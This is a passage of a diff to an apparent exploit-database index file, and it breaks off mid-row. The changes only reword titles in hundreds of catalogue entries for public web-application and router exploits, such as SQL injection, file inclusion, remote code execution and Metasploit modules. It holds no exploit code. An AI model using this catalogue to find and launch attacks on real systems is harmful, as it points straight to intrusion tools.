17423,exploits/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,webapps,php, 17426,exploits/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",webapps,php, 17428,exploits/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",webapps,php, @@ -25626,7 +25627,7 @@ id,file,description,date,author,type,platform,port 17603,exploits/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",webapps,php, 17606,exploits/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,webapps,multiple, 17613,exploits/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,webapps,php, -17615,exploits/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,webapps,jsp, +17615,exploits/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - (Authenticated) Code Execution (Metasploit)",2011-08-05,Metasploit,webapps,jsp, 17616,exploits/php/webapps/17616.txt,"WordPress Plugin ProPlayer 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",webapps,php, 17617,exploits/php/webapps/17617.txt,"WordPress Plugin Social Slider 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",webapps,php, 17637,exploits/php/webapps/17637.txt,"Simple Machines Forum (SMF) 2.0 - Session Hijacking",2011-08-07,seth,webapps,php, @@ -25737,7 +25738,7 @@ id,file,description,date,author,type,platform,port 17813,exploits/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",webapps,php, 17814,exploits/php/webapps/17814.txt,"WordPress Plugin Event Registration 5.44 - SQL Injection",2011-09-09,serk,webapps,php, 17816,exploits/php/webapps/17816.txt,"WordPress Plugin Tune Library 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",webapps,php, -17818,exploits/php/webapps/17818.txt,"TomatoCart 1.1 - Authenticated Local File Inclusion",2011-09-12,brain[pillow],webapps,php, +17818,exploits/php/webapps/17818.txt,"TomatoCart 1.1 - (Authenticated) Local File Inclusion",2011-09-12,brain[pillow],webapps,php, 17822,exploits/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],webapps,php, 17823,exploits/php/webapps/17823.txt,"NetCat CMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],webapps,php, 17824,exploits/php/webapps/17824.txt,"Slaed CMS - Code Execution",2011-09-12,brain[pillow],webapps,php, @@ -26089,14 +26090,14 @@ id,file,description,date,author,type,platform,port 18613,exploits/php/webapps/18613.txt,"ASP Classifieds - SQL Injection",2012-03-17,r45c4l,webapps,php, 18614,exploits/php/webapps/18614.txt,"PRE PRINTING STUDIO - SQL Injection",2012-03-17,r45c4l,webapps,php, 18632,exploits/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",webapps,php, -18626,exploits/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,webapps,jsp, +18626,exploits/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal",2012-03-19,rgod,webapps,jsp, 18631,exploits/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",webapps,php, 18932,exploits/linux/webapps/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,webapps,linux, 18638,exploits/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,webapps,hardware, 18639,exploits/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,webapps,php, 18644,exploits/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,webapps,php, 18646,exploits/hardware/webapps/18646.txt,"Cyberoam UTM - Multiple Vulnerabilities",2012-03-22,"Saurabh Harit",webapps,hardware, -18647,exploits/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",webapps,php, +18647,exploits/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - SQL Database Export",2012-03-22,"Mark Stanislav",webapps,php, 18648,exploits/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",webapps,php, 18649,exploits/php/webapps/18649.txt,"FreePBX 2.9.0/2.10.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",webapps,php, 18650,exploits/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,webapps,php, @@ -26122,7 +26123,7 @@ id,file,description,date,author,type,platform,port 18715,exploits/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",webapps,multiple, 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php, 18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi, -18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - Authenticated OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php, +18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php, 18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php, 18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php, 18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php, @@ -26147,7 +26148,7 @@ id,file,description,date,author,type,platform,port 18782,exploits/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",webapps,php, 18788,exploits/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,webapps,php, 18787,exploits/php/webapps/18787.txt,"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",webapps,php, -18797,exploits/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Unauthenticated Remote Code Injection (Metasploit)",2012-04-29,Metasploit,webapps,linux, +18797,exploits/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Remote Code Injection (Metasploit)",2012-04-29,Metasploit,webapps,linux, 18798,exploits/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",webapps,php, 18791,exploits/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",webapps,php, 18793,exploits/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",webapps,php, @@ -26345,7 +26346,7 @@ id,file,description,date,author,type,platform,port 20044,exploits/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,webapps,php, 20055,exploits/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",webapps,php, 20062,exploits/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,webapps,php, -20063,exploits/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,webapps,windows, +20063,exploits/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / (Authenticated) SQL Injection",2012-07-23,dookie,webapps,windows, 20064,exploits/linux/webapps/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,webapps,linux, 20083,exploits/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",webapps,php, 20087,exploits/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,webapps,php, @@ -26502,7 +26503,7 @@ id,file,description,date,author,type,platform,port 21082,exploits/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",webapps,multiple, 21084,exploits/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,webapps,php, 21085,exploits/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",webapps,asp, -21119,exploits/php/webapps/21119.txt,"PostNuke 0.6 - Unauthenticated User Login",2001-10-13,anonymous,webapps,php, +21119,exploits/php/webapps/21119.txt,"PostNuke 0.6 - User Login",2001-10-13,anonymous,webapps,php, 21132,exploits/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,webapps,php, 21133,exploits/php/webapps/21133.txt,"Clipster Video - Persistent Cross-Site Scripting",2012-09-07,DaOne,webapps,php, 21134,exploits/hardware/webapps/21134.txt,"Sitecom Home Storage Center - Authentication Bypass",2012-09-07,"Mattijs van Ommeren",webapps,hardware, @@ -26624,7 +26625,7 @@ id,file,description,date,author,type,platform,port 21535,exploits/cgi/webapps/21535.txt,"MakeBook 2.2 - Form Field Input Validation",2002-06-12,b0iler,webapps,cgi, 21543,exploits/java/webapps/21543.txt,"Ruslan Communications Builder - Authentication Bypass",2002-06-13,"Alexander Korchagin",webapps,java, 21545,exploits/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",webapps,jsp, -21546,exploits/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,webapps,windows, +21546,exploits/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - (Authenticated) Blind SQL Injection",2012-09-27,otoy,webapps,windows, 21552,exploits/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,webapps,php, 21553,exploits/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,webapps,cgi, 21557,exploits/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,webapps,php, @@ -26645,7 +26646,7 @@ id,file,description,date,author,type,platform,port 21622,exploits/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,webapps,php, 21628,exploits/php/webapps/21628.txt,"Geeklog 1.3.5 - HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",webapps,php, 21640,exploits/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,webapps,php, -21646,exploits/php/webapps/21646.py,"WordPress Theme Archin 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,webapps,php, +21646,exploits/php/webapps/21646.py,"WordPress Theme Archin 3.2 - Configuration Access",2012-10-01,bwall,webapps,php, 21658,exploits/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",webapps,cgi, 21659,exploits/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",webapps,cgi, 21660,exploits/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",webapps,php, @@ -26655,7 +26656,7 @@ id,file,description,date,author,type,platform,port 40361,exploits/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,webapps,php,80 40364,exploits/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",webapps,php,80 40366,exploits/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",webapps,php,80 -40367,exploits/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40367,exploits/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 21676,exploits/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Inclusion",2002-08-01,PowerTech,webapps,php, 21679,exploits/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,webapps,cgi, 21702,exploits/asp/webapps/21702.txt,"Midicart ASP - Remote Customer Information Retrieval",2002-08-10,"Dimitri Sekhniashvili",webapps,asp, @@ -27006,7 +27007,7 @@ id,file,description,date,author,type,platform,port 22671,exploits/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - 'URI' File Disclosure",2003-05-29,pokleyzz,webapps,php, 22672,exploits/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,webapps,php, 22673,exploits/asp/webapps/22673.txt,"philboard 1.14 - 'philboard_admin.asp' Authentication Bypass",2003-05-29,aresu@bosen.net,webapps,asp, -22675,exploits/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,webapps,php, +22675,exploits/php/webapps/22675.txt,"Geeklog 1.3.x - (Authenticated) SQL Injection",2003-05-29,pokleyzz,webapps,php, 22684,exploits/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,webapps,php, 22687,exploits/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,webapps,php, 22688,exploits/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Remote File Inclusion",2003-05-29,JeiAr,webapps,cgi, @@ -27168,14 +27169,14 @@ id,file,description,date,author,type,platform,port 23106,exploits/php/webapps/23106.txt,"SchoolCMS - Persistent Cross-Site Scripting",2012-12-03,VipVince,webapps,php, 23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple, 23110,exploits/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download",2012-12-03,"Ben Williams",webapps,linux, -23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",webapps,multiple, +23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Local File Inclusion",2012-12-03,"SEC Consult",webapps,multiple, 23120,exploits/asp/webapps/23120.txt,"ICQ 2003 - Webfront Guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",webapps,asp, 23125,exploits/php/webapps/23125.txt,"phpBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,webapps,php, 23127,exploits/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",webapps,cgi, 23128,exploits/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Full Path Disclosure",2003-09-09,"Bahaa Naamneh",webapps,cgi, 23129,exploits/php/webapps/23129.txt,"Invision Power Board (IP.Board) 1.x - 'index.php' showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",webapps,php, 23132,exploits/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal",2012-12-04,Nin3,webapps,windows, -23140,exploits/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,webapps,php, +23140,exploits/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - (Authenticated) SQL Injection",2003-09-12,frog,webapps,php, 23153,exploits/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,webapps,cgi, 23158,exploits/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - 'banners.php?bid' SQL Injection",2003-09-18,"Lifo Fifo",webapps,php, 23159,exploits/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - 'emailarticle.php?id' SQL Injection",2003-09-18,"Lifo Fifo",webapps,php, @@ -27771,7 +27772,7 @@ id,file,description,date,author,type,platform,port 24476,exploits/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, 24477,exploits/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, 24478,exploits/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, -24480,exploits/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,webapps,php, +24480,exploits/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,webapps,php, 24481,exploits/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",webapps,php, 24483,exploits/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",webapps,hardware, 24484,exploits/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,webapps,hardware, @@ -28165,8 +28166,8 @@ id,file,description,date,author,type,platform,port 25250,exploits/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,webapps,php, 25251,exploits/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,webapps,hardware, 25252,exploits/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",webapps,asp, -25253,exploits/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - 'upload.asp' Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",webapps,asp, -25254,exploits/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - 'myFiles.asp' Unauthenticated File Manipulation",2005-03-21,"farhad koosha",webapps,asp, +25253,exploits/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - 'upload.asp' Arbitrary File Upload",2005-03-21,"farhad koosha",webapps,asp, +25254,exploits/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - 'myFiles.asp' File Manipulation",2005-03-21,"farhad koosha",webapps,asp, 25257,exploits/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"GulfTech Security",webapps,php, 25258,exploits/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",webapps,php, 25260,exploits/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",webapps,php, @@ -28577,7 +28578,7 @@ id,file,description,date,author,type,platform,port 25806,exploits/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"GulfTech Security",webapps,php, 25808,exploits/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"GulfTech Security",webapps,php, 25810,exploits/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversals",2013-05-29,"Adam Simuntis",webapps,hardware, -25811,exploits/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,webapps,hardware, +25811,exploits/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Phone Call",2013-05-29,b0rh,webapps,hardware, 25812,exploits/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware, 25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware, 25815,exploits/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware, @@ -28913,7 +28914,7 @@ id,file,description,date,author,type,platform,port 26244,exploits/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",webapps,php, 26246,exploits/php/webapps/26246.txt,"Simple File Manager 024 - Authentication Bypass",2013-06-17,Chako,webapps,php, 26247,exploits/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,webapps,php, -40300,exploits/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",webapps,php,80 +40300,exploits/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Arbitrary File Upload",2016-08-29,"Lars Morgenroth",webapps,php,80 26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php, 26253,exploits/php/webapps/26253.txt,"Land Down Under 800/801 - 'auth.php?m' SQL Injection",2005-09-13,"GroundZero Security Research",webapps,php, 26254,exploits/php/webapps/26254.txt,"Land Down Under 800/801 - 'plug.php?e' SQL Injection",2005-09-13,"GroundZero Security Research",webapps,php, @@ -29589,7 +29590,7 @@ id,file,description,date,author,type,platform,port 27103,exploits/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,webapps,php, 27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, 27105,exploits/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php?Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, -27106,exploits/php/webapps/27106.txt,"aoblogger 2.3 - 'create.php' Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, +27106,exploits/php/webapps/27106.txt,"aoblogger 2.3 - 'create.php' Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, 27107,exploits/php/webapps/27107.txt,"PHPXplorer 0.9.33 - 'action.php' Directory Traversal",2006-01-16,liz0,webapps,php, 27109,exploits/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",webapps,php, 27110,exploits/php/webapps/27110.txt,"EggBlog 2.0 - 'id' SQL Injection",2006-01-18,alex@evuln.com,webapps,php, @@ -30929,7 +30930,7 @@ id,file,description,date,author,type,platform,port 28964,exploits/php/webapps/28964.txt,"Bitweaver 1.x - '/wiki/orphan_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, 28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, 28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php, -28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80 +28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80 28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80 28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix, 28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios, @@ -30947,7 +30948,7 @@ id,file,description,date,author,type,platform,port 28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp, 28991,exploits/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"laurent gaffie",webapps,asp, 28992,exploits/asp/webapps/28992.txt,"INFINICART - 'browse_group.asp?groupid' SQL Injection",2006-11-13,"laurent gaffie",webapps,asp, -40373,exploits/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40373,exploits/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 28993,exploits/asp/webapps/28993.txt,"INFINICART - 'added_to_cart.asp?ProductID' SQL Injection",2006-11-13,"laurent gaffie",webapps,asp, 28994,exploits/asp/webapps/28994.txt,"INFINICART - 'browsesubcat.asp' Multiple SQL Injections",2006-11-13,"laurent gaffie",webapps,asp, 28995,exploits/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,webapps,php,80 @@ -31040,7 +31041,7 @@ id,file,description,date,author,type,platform,port 29093,exploits/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' SQL Injection",2006-11-18,"Aria-Security Team",webapps,asp, 29094,exploits/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' SQL Injection",2006-11-18,"Aria-Security Team",webapps,asp, 29095,exploits/php/webapps/29095.txt,"Blog:CMS 4.1.3 - 'list.php' Cross-Site Scripting",2006-11-18,Katatafish,webapps,php, -40372,exploits/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40372,exploits/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 29097,exploits/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,webapps,php, 29098,exploits/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php?msg' Cross-Site Scripting",2006-11-20,the_Edit0r,webapps,php, 29099,exploits/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,webapps,php, @@ -31117,7 +31118,7 @@ id,file,description,date,author,type,platform,port 29197,exploits/asp/webapps/29197.txt,"Evolve Shopping Cart - 'products.asp' SQL Injection",2006-11-27,"Aria-Security Team",webapps,asp, 29198,exploits/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - '_404_not_found.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",webapps,php, 29199,exploits/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - '_410_stats_gone.page.php?app_name' Cross-Site Scripting",2006-11-16,"lotto fischer",webapps,php, -40371,exploits/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40371,exploits/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 29200,exploits/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - '_referer_spam.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",webapps,php, 29202,exploits/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - 'polls.php' SQL Injection",2006-11-30,ajann,webapps,php, 29203,exploits/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - 'register.php' Cross-Site Scripting",2006-11-30,blueshisha,webapps,php, @@ -31194,7 +31195,7 @@ id,file,description,date,author,type,platform,port 29331,exploits/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,webapps,php, 29332,exploits/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",webapps,php, 29333,exploits/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' SQL Injection",2006-12-22,ShaFuq31,webapps,asp, -40370,exploits/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40370,exploits/cgi/webapps/40370.sh,"PLANET VDR-300NU 